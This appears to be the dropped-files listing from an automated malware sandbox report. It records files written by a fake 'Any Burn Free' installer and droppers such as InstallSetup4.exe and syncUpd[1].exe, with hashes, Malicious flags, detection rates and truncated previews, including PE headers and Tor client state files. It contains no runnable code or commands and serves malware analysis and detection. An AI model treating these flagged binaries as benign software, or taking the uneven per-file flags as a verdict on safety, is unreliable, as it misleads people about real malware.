                                                                                                                                                                    Preview:..[.L.A.N.G.U.A.G.E.].....n.a.m.e.1.=.E.n.g.l.i.s.h.....n.a.m.e.2.=.E.s.p.a...o.l.....n.a.m.e.3.=.D.e.u.t.s.c.h.....n.a.m.e.4.=.F.r.a.n...a.i.s.....n.a.m.e.5.=.I.t.a.l.i.a.n.o.....n.a.m.e.6.=..e,g......n.a.m.e.7.=.M.a.g.y.a.r.....n.a.m.e.8.=.T...r.k.....n.a.m.e.9.=.'.D.9.1.(.J.).....n.a.m.e.1.0.=.R.o.m...n.......n.a.m.e.1.1.=.A~.-N.e....f.i.l.e.=.e.n.g.l.i.s.h...i.n.i.....[.P.A.T.H.].....n.a.m.e.=.D.:.\.....[.T.I.M.E.S.].....t.i.m.e.=.0.

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\swresample-3.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):129038
                                                                                                                                                                    Entropy (8bit):6.508174898498455
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:2n7B3zAWc/gG6IsRc+JdTCXw4hXAMpI3pr:2n7B3zAWc/SmXfAMK
                                                                                                                                                                    MD5:3D8C24A40935FB27FC494FC6147E6EA8
                                                                                                                                                                    SHA1:C26B6949C34AADB8271E124CE08F511BE5033A04
                                                                                                                                                                    SHA-256:F83401305ACDA249D2A81CD8496E08643686FF1327EE4A495A1F3ABD77C7C3E6
                                                                                                                                                                    SHA-512:2EC272A4E770FB0B748ED3F3ED9E9A6983B2AB9B88D0C57C63E2248A1EF2B8D8A528EFAAD488CA377DBD05748DFA87DF086DDFA6B0DAD58571C47732320DC958
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...$.f................................................................@... ...................... .......0..T....`.......................p..x...................................................X1...............................text...$d.......f..................`.P`.data...P............j..............@.P..rdata..PE.......F...l..............@.`@/4.......'.......(..................@.0@.bss..................................0..edata....... ......................@.0@.idata..T....0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..rsrc........`......................@.0..reloc..x....p......................@.0B........................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\unins000.dat

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:InnoSetup Log Any Burn Free, version 0x30, 5355 bytes, 172892\user, "C:\Users\user\AppData\Local\Any Burn Free"
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5355
                                                                                                                                                                    Entropy (8bit):4.815654073347022
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:3EWvR2vpeHG9T+eOIhEt7ICSss/LnNF6ME:3EWvYvpeJHIhKICSsAnNU1
                                                                                                                                                                    MD5:84A70A2829E8A97E2FA8D089ACAF8B01
                                                                                                                                                                    SHA1:1F1FDFC1CFCB81B50E20339234ABE58D017978D6
                                                                                                                                                                    SHA-256:49CBDEFE8CD39CE87E3B77D200C0E1DDBE5563D3392D6F24118860E77985FDED
                                                                                                                                                                    SHA-512:23BEC94C96424864CEF3294ED1850C0CDD71C4BD21F00FFA5C985DA2EE73C57167CDD6A87F96BF327B35BCD59ABEAE0A12AB039851C4A6C3831548B5719A4ABB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:Inno Setup Uninstall Log (b)....................................Any Burn Free...................................................................................................................Any Burn Free...................................................................................................................0...........%................................................................................................................U.i........SY........J....172892.user*C:\Users\user\AppData\Local\Any Burn Free.............5.... ............IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.dll.G

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\unins000.exe (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):715253
                                                                                                                                                                    Entropy (8bit):6.514659189868709
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:O/kqO+1G7DMvrP537dzHsA6BllcOuGbnH3ERNIg9rNlQyRLh1K8xyFo:ukqZ1G7DMvrP537dzHsA6hcHGbH3Elh9
                                                                                                                                                                    MD5:50E93FA63C3EDA941B0FC757F7E2E197
                                                                                                                                                                    SHA1:177980A985C51C4645E757027A1C636516AD72E3
                                                                                                                                                                    SHA-256:84A9745A4DC38B42A30F226373088AC5C3E57BA5A83245831B74D33AF57CA27A
                                                                                                                                                                    SHA-512:61A42EC25FB0C4C08F6D1F899A299F999C2688A0DD0E98FC017E7E125CB73F7FB53CABF6C4BDE40357AA4A996DDB689C2D5646CDD1D4EEFCCF525E50C1195C9D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t........................@..............................................@..............................`%..................................................................................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS.....l................................idata..`%.......&..................@....tls.....................................rdata..............................@..P.reloc..@.... ......................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Any Burn Free\zlib1.dll (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):127192
                                                                                                                                                                    Entropy (8bit):6.479927027421408
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:/fMTf09hjtHy4xaIqGpnuJY8KYA/hKjUR+YABqKBrnToIfqIOoIOGESvrTEgTWjx:XMA3Fa0sYDY6hKgRvwqOTBf4uGE+rYgE
                                                                                                                                                                    MD5:8B2A6E8419A8A4E7D3FD023D97455FB9
                                                                                                                                                                    SHA1:2547A1F94FB4F83B7C133A3E285EE11FAA155E84
                                                                                                                                                                    SHA-256:7087CDD1ACDFF6CD1B8D821388F430AF3888314B05A5821BB53E67034362F670
                                                                                                                                                                    SHA-512:44438F6DD4BECABC2CB3053E2C42877CBDB0F309FE272F67A94AD530CAF1C5E5D49BC394F7D21C4226A4F0EB6D8661C5C7113508EA2F446E0DBEA0D59554D4A4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........=......#...#.>...................P.....c.........................`......;.....@... .............................. ...............................P......................................................0!...............................text...d=.......>..................`.P`.data...L....P.......B..............@.0..rdata.. S...`...T...D..............@.`@/4.......2.......4..................@.0@.bss....P.............................`..edata..............................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1022
                                                                                                                                                                    Entropy (8bit):5.2035390479411125
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:YqHZ6T06Mhmkm/Ab0O0bihmXm/A6CUXyhmem/AbxdB6hmbFm/Az0Jahmom/AbNdy:YqHZ6T06McJ/Ab0O0bic2/ADUXycP/AQ
                                                                                                                                                                    MD5:AB89C7E4B4333282CA648063F0A3CC89
                                                                                                                                                                    SHA1:A6E2C23F81A3A00C8835723047B70E7103FF5E9D
                                                                                                                                                                    SHA-256:FD8BBE93A67843A391D036CE11EF5DEFECE644B59C12B3C265C9B90269D30BE1
                                                                                                                                                                    SHA-512:0EFEB0953B45E8CB1B8ACCB158B629450CD2CBDE2B25FBD04C83D38BE222A047C6F1894FC0918E63677EF6833845BFC0D3579F1FC20094E92394BFF1ECEFC2EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":1078981936,"LastSwitchedHighPart":31061909,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":1068981936,"LastSwitchedHighPart":31061909,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":1058981936,"LastSwitchedHighPart":31061909,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":1048981936,"LastSwitchedHighPart":31061909,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":1038981936,"LastSwitchedHighPart":31061909,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":1028981936,"LastSwitchedHighPart":31061909,

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2FMK3KK3\ping[1].htm

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:V:V
                                                                                                                                                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:0

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MHXXL5K6\syncUpd[1].exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):216576
                                                                                                                                                                    Entropy (8bit):7.155500901207139
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:mPmxOt8q3qGCZUU22cQqaV8lSIWa5l9OpuOfU/6eMsJjEyXAvDmAeqQ:mcOtd6HwQqaVqWSlhOfneMua
                                                                                                                                                                    MD5:823C0164A0A978C450F088B7AE3885D0
                                                                                                                                                                    SHA1:B78950D38D2CE8B295631C0A3CA56AF1257FB07B
                                                                                                                                                                    SHA-256:603A6DF8C501F61593D3DF9C82405736129DB0D1601F830CE953CEC00819F8D9
                                                                                                                                                                    SHA-512:614588F7D1778B035821C953BF109BAE2EA0CB265AE99A9C677B900636A4F472AA36A43DD8AECEB95C404D664B59A7947AA4F9101474D7F8ECF919D3A0C62D31
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................F.....s.....G.....~..........B.....w.....p....Rich...................PE..L....1$c.....................4{...................@...........................~......B......................................$...<.....}.0...................................................X........................................................text............................... ..`.rdata...1.......2..................@..@.data.....z.. ......................@....sowa...|.....}.....................@....tls..........}...... ..............@....xeyekus......}......*..............@..@.jejol........}......,..............@....rsrc...0.....}......0..............@..@........................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):15004
                                                                                                                                                                    Entropy (8bit):5.4898710790136045
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:s1jFWxPwvGLg2EAHAvU0JfWiwXIXRe06Ck2+sa9gE+kZnX3iN0HJhnUbmEE101U+:ocCqEAd+fbA4meSl+OM4RGXJm89zV
                                                                                                                                                                    MD5:8A1A95A0A38D2AE0EA006275588BEA6F
                                                                                                                                                                    SHA1:B66CD329F9FB263A26008F9BC3E176201B487791
                                                                                                                                                                    SHA-256:232927662FF5D2FCCD33B735E2A6CE179E355125943F8615DD7886406EF5650E
                                                                                                                                                                    SHA-512:52C362383C8A89207E0EE68CFB72634B7C18AC3E8B2389EE6D58B74C7F352B7C98B94AD26DF29AAEE06586D8A25574070A1BDE2400585BBF4E45C97352244289
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:@...e...........r....................................@..........H...............o..b~.D.poM...%..... .Microsoft.PowerShell.ConsoleHostD...............E...y.BG.\..............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...f.......System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementD....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\914D.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4315536
                                                                                                                                                                    Entropy (8bit):7.986023355020629
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:Ox34CiKzvjm7SLtMZTm7LASnwWEuCSeZHe31O6Y/qHYq9Pei:OB4yzvjmEtMf+wT3Us6Y/qHYKB
                                                                                                                                                                    MD5:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                                                                                                    SHA1:CD1D1DC2C79C0EE394B72EFC264CFD54D96E1EE5
                                                                                                                                                                    SHA-256:B7A6DCFDD64173ECBCEF562FD74AEE07F3639FA863BD5740C7E72DDC0592B4FC
                                                                                                                                                                    SHA-512:8755979D7383D6CB5E7D63798C9CA8B9C0FAEEC1FE81907FC75BBBB7BE6754AB7B5A09A98492A27F90E3F26951B6891C43D8ACD21414FB603CD86A4E10DAC986
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...&f.d.................`@..p...............p@...@...................................B......................................@.<.....A...............A..............q@...............................@.@............p@.`............................text....^@......`@................. ..`.rdata...W...p@..X...d@.............@..@.data.........@..P....@.............@....rsrc.....O...A.......A.............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4312.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):357888
                                                                                                                                                                    Entropy (8bit):7.589660325609797
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:w3hATyb78RwGAGDebIWQjoN2j1f+4+GSAkrOWzNCU2OC:MATfwGCbIWSj1fvSAkrOyUOC
                                                                                                                                                                    MD5:D713561644BC8D1C46520CEBC01358FB
                                                                                                                                                                    SHA1:FE1C875267AB7E66FC2831D95E513D73BBB1CB47
                                                                                                                                                                    SHA-256:6060CE8F51A10AE5EBC3B2C8DBDCCCA2FE30E626652F170BCA0A1B2256F5464B
                                                                                                                                                                    SHA-512:750BBA5FEBE4275606400FFB8DD14332858C132BEC0113F9970298F3F1C809A01483349EDDF0330C77D6C16D7BEE412A7E246D59B987B2A385C6D23067C0BAD8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 38%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................F.....s.....G.....~..........B.....w.....p....Rich...................PE..L.....c.....................4{...................@..........................@..............................................$8..<.... ..0...................................................X5.......5..@............................................text...R........................... ..`.rdata...1.......2..................@..@.data.....z..P.......(..............@....duseces|............F..............@....tls.................H..............@....mesu................R..............@..@.vuk.................T..............@....rsrc...0.... .......X..............@..@........................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-certs (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16296
                                                                                                                                                                    Entropy (8bit):6.051784423131597
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:72q4PLVWO1h4f/40VVq1h8PXttMY4QkV6icO1hMtqyd4AW9V9hC1hIhyd24ZFtVy:VyLJUHJiO9RBkoicOaqyrqvUg62M1uxf
                                                                                                                                                                    MD5:CF4E887448D75F8A18EE2BCF9997D9E8
                                                                                                                                                                    SHA1:51CE5272CAAADCDEE5EBE4D6468FC739CA4B08E8
                                                                                                                                                                    SHA-256:2F81FE7C9282E57A0C2DF8C363FE0F28B877E3A457C928890C87EFE4D02596D2
                                                                                                                                                                    SHA-512:6ECFE545E430EA0E9847D83B423555EE774D993EE5B474026B9544FCEDFD2857662190D11011FBF071E03435B20EBB0A205E6A360C99C2B69BC71DF43C4BE98D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:dir-key-certificate-version 3..fingerprint 27102BC123E7AF1D4741AE047E160C91ADC76B21..dir-key-published 2024-02-07 19:34:53..dir-key-expires 2025-02-07 19:34:53..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEAuxgnMVH4vwBjMeGvrEODOYcjbCS4N+Wt0SZ6XA5I08HyMf5AbaaF..MDscJBRIUOp7DyLmUwK+jp+QI8pUjjKsB8S0ctb/J3Im2T6CXnP2KgEfVmpNVQmV..XdMm8cRZl1uIZDDBAXizSQ51f9A17TJh7pF/5khYp/SAzl6aO5ETn7ry0ITiJnNa..6cY+400F7ZBA8NuXnCHVGfmpFFsiJKFrS1Kve629eeaNEd3mynRviBXJy5a4NEGf..y42Ev8on6SxEnF9OG0NMJ081/+mP+j8Dsl3+Uehzr9B42MQQfDo4RdYGrt9XolBm..L4eay1ieZEsFeDy0TMfiGGbr90wo1fgGLHIRSfTNLhhPJ/f9cTZPe98rhSgGWiAd..RvK5SljoIOR4qdS9/aiZkj1P+etvh1rIQUcG4/xCOBnouEBK+DDHZFqyMtpMPtV0..Bxi20DVaMJcyhdfjVqcRSyuR8tlOnTid6QwBj6kgIIfMaC+4Ht6yO/SYquCWlaZl..y7Pu7li8WyW9AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAqbw3BcQ7lAjDy4geKZKLdVD5gTuYm2rO20K1iHQhUR2dChQF1AON..ORyQMaJS9pBIKE27IAIFcCzrbgJ5dggKIOk+1A7du7dbl+RClLM4cBXaqKBiNmWK..s6qLHwM1E6la2Ts5b3XUhMlryuNl

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2764996
                                                                                                                                                                    Entropy (8bit):5.611307879156549
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:5Fs5sMgUlyGepUBtiyGI6sblIr4xcWVFaud6cpaqPr3+JA0wLj:5O5oUyCiyXr2Ma/cgOyJQn
                                                                                                                                                                    MD5:A826937369755BAD667D25BEFB37DD19
                                                                                                                                                                    SHA1:668335BC0B1C5E79B98D6D30B871641C5D711EF6
                                                                                                                                                                    SHA-256:AD12C3922382398EA7C436A658299B63FEBDFF972261CBA2FC311152776FC8CE
                                                                                                                                                                    SHA-512:B906933F00B6711F4CFCCA2AD3361B4AF69983E3A74F050FA905E4F89BBA0CDECA8918024862D87BD3E407BA48E1DCFCFD84C410787C7707DA7B35027EE78D58
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-08 17:00:00.fresh-until 2024-02-08 18:00:00.valid-until 2024-02-08 20:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4KPV6A~1\state (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3496
                                                                                                                                                                    Entropy (8bit):5.327143766503475
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cNW3dUpQHNRFHoXGQYtVn5g7Qc+uzsQ7MG7G59hg0x7NkGT:O56RFHoXGQe5IQ5uzswB7G59hg0vkGT
                                                                                                                                                                    MD5:BB5B2F4AB246007BDB9E9B727A402B7F
                                                                                                                                                                    SHA1:5FA6C4F926C96633555226DC56E27DD803955DCB
                                                                                                                                                                    SHA-256:CC45C4BDDEA3EE288FDFB688429F058EAC3AA9CA26CA2A08D94E734D670FDE90
                                                                                                                                                                    SHA-512:7DD5056A7565D0EF8C327CB1061B626EB5E50835B0704A9F0EB7EE9F73F4CD932C49B8FCA38992929EBA6DAFDC5E028729249C9CCB21C1E1ED224C81F598FCEE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:# Tor state file last generated on 2024-02-08 19:20:39 local time..# Other times below are in UTC..# You *do not* need to edit this file.....Dormant 0..Guard in=default rsa_id=937CAFC317E8DC0F05E2AA314DA3DADBEDD509D2 nickname=overtake sampled_on=2024-02-06T03:44:43 sampled_idx=0 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-01-31T10:08:26 confirmed_idx=1..Guard in=default rsa_id=4C25542B7649FC0472EDBF77521EA578F9AF5155 nickname=dc6jgk12d sampled_on=2024-02-06T13:55:32 sampled_idx=1 sampled_by=0.4.4.9 listed=1 confirmed_on=2024-02-04T17:46:49 confirmed_idx=0..Guard in=default rsa_id=AA7630738F82C4DF26BB8EFF131564DACDEAC64C nickname=Unnamed sampled_on=2024-01-31T05:12:05 sampled_idx=2 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=4CE6D83FFA8AD24767007E8C972F371F2468F09A nickname=bauruine sampled_on=2024-02-03T10:53:51 sampled_idx=3 sampled_by=0.4.4.9 listed=1..Guard in=default rsa_id=D11A3C113BBD6CC7A89CC6AB6FD7783F7749CB65 nickname=gazelle sampled_on=2024-02-04T13:27:57 sampled_i

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4KPV6A~1\unverified-microdesc-consensus (copy)

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines (1006)
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2764996
                                                                                                                                                                    Entropy (8bit):5.611307879156549
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:5Fs5sMgUlyGepUBtiyGI6sblIr4xcWVFaud6cpaqPr3+JA0wLj:5O5oUyCiyXr2Ma/cgOyJQn
                                                                                                                                                                    MD5:A826937369755BAD667D25BEFB37DD19
                                                                                                                                                                    SHA1:668335BC0B1C5E79B98D6D30B871641C5D711EF6
                                                                                                                                                                    SHA-256:AD12C3922382398EA7C436A658299B63FEBDFF972261CBA2FC311152776FC8CE
                                                                                                                                                                    SHA-512:B906933F00B6711F4CFCCA2AD3361B4AF69983E3A74F050FA905E4F89BBA0CDECA8918024862D87BD3E407BA48E1DCFCFD84C410787C7707DA7B35027EE78D58
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:network-status-version 3 microdesc.vote-status consensus.consensus-method 33.valid-after 2024-02-08 17:00:00.fresh-until 2024-02-08 18:00:00.valid-until 2024-02-08 20:00:00.voting-delay 300 300.client-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.server-versions 0.4.8.1-alpha,0.4.8.2-alpha,0.4.8.3-rc,0.4.8.4,0.4.8.5,0.4.8.6,0.4.8.7,0.4.8.8,0.4.8.9,0.4.8.10.known-flags Authority BadExit Exit Fast Guard HSDir MiddleOnly NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 Microdesc=2 Relay=2.recommended-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.required-client-protocols Cons=2 Desc=2 Link=4 Microdesc=2 Relay=2.required-relay-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=2 Link=4-5 LinkAuth=3 Microdesc=2 Relay=2.params AuthDirMaxServersPerAddr=8 CircuitPriorit

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\4kPv6aJG8e\cached-certs.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\5A89.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16296
                                                                                                                                                                    Entropy (8bit):6.051784423131597
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:72q4PLVWO1h4f/40VVq1h8PXttMY4QkV6icO1hMtqyd4AW9V9hC1hIhyd24ZFtVy:VyLJUHJiO9RBkoicOaqyrqvUg62M1uxf
                                                                                                                                                                    MD5:CF4E887448D75F8A18EE2BCF9997D9E8
                                                                                                                                                                    SHA1:51CE5272CAAADCDEE5EBE4D6468FC739CA4B08E8
                                                                                                                                                                    SHA-256:2F81FE7C9282E57A0C2DF8C363FE0F28B877E3A457C928890C87EFE4D02596D2
                                                                                                                                                                    SHA-512:6ECFE545E430EA0E9847D83B423555EE774D993EE5B474026B9544FCEDFD2857662190D11011FBF071E03435B20EBB0A205E6A360C99C2B69BC71DF43C4BE98D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
